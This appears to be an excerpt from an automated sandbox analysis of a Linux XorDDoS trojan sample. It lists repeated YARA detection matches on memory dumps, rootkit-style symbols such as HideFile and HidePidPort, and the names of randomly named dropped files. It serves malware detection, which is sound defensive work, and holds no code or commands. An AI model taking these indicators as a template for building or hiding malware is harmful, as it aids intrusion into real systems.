        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6493.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6421.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6389.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6310.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6532.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6472.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6401.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6469.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6550.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: HaJTqGiPpDELF static info symbol of initial sample: HideFile
        Source: HaJTqGiPpDELF static info symbol of initial sample: HidePidPort
        Source: HaJTqGiPpDELF static info symbol of initial sample: __after_morecore_hook
        Source: HaJTqGiPpDELF static info symbol of initial sample: __free_hook
        Source: HaJTqGiPpDELF static info symbol of initial sample: __libc_register_dl_open_hook
        Source: HaJTqGiPpDELF static info symbol of initial sample: __libc_register_dlfcn_hook
        Source: HaJTqGiPpDELF static info symbol of initial sample: __malloc_hook
        Source: HaJTqGiPpDELF static info symbol of initial sample: __malloc_initialize_hook
        Source: HaJTqGiPpDELF static info symbol of initial sample: __memalign_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: HideFile
        Source: libudev.so.17.drELF static info symbol of dropped file: HidePidPort
        Source: libudev.so.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: __free_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: __malloc_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: libudev.so.17.drELF static info symbol of dropped file: __memalign_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: HideFile
        Source: kigdktzeum.17.drELF static info symbol of dropped file: HidePidPort
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __free_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __malloc_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: kigdktzeum.17.drELF static info symbol of dropped file: __memalign_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: HideFile
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: HidePidPort
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __free_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __malloc_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: mizdkrdyqj.17.drELF static info symbol of dropped file: __memalign_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: HideFile
        Source: becqudbgme.17.drELF static info symbol of dropped file: HidePidPort
        Source: becqudbgme.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: __free_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: __malloc_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: becqudbgme.17.drELF static info symbol of dropped file: __memalign_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: HideFile
        Source: sxruomujjd.17.drELF static info symbol of dropped file: HidePidPort
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __free_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __malloc_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: sxruomujjd.17.drELF static info symbol of dropped file: __memalign_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: HideFile
        Source: qrabekbstr.17.drELF static info symbol of dropped file: HidePidPort
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __free_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __malloc_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: qrabekbstr.17.drELF static info symbol of dropped file: __memalign_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: HideFile
        Source: sotpizdssr.17.drELF static info symbol of dropped file: HidePidPort
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __free_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __malloc_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: sotpizdssr.17.drELF static info symbol of dropped file: __memalign_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: HideFile
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: HidePidPort
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __free_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __malloc_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: gnmftoxpza.17.drELF static info symbol of dropped file: __memalign_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: HideFile
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: HidePidPort
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __free_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __malloc_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: iulapzbfpq.17.drELF static info symbol of dropped file: __memalign_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: HideFile
        Source: posifzmmhg.17.drELF static info symbol of dropped file: HidePidPort
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __free_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __malloc_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: posifzmmhg.17.drELF static info symbol of dropped file: __memalign_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: HideFile
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: HidePidPort
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __free_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __malloc_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: buxftyvhwp.17.drELF static info symbol of dropped file: __memalign_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: HideFile
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: HidePidPort
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __free_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __malloc_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: wvbxepjyjx.17.drELF static info symbol of dropped file: __memalign_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: HideFile
        Source: eqznayducj.17.drELF static info symbol of dropped file: HidePidPort
        Source: eqznayducj.17.drELF static info symbol of dropped file: __after_morecore_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: __free_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: __libc_register_dl_open_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: __libc_register_dlfcn_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: __malloc_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: __malloc_initialize_hook
        Source: eqznayducj.17.drELF static info symbol of dropped file: __memalign_hook
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
        Source: HaJTqGiPpD, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
        Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
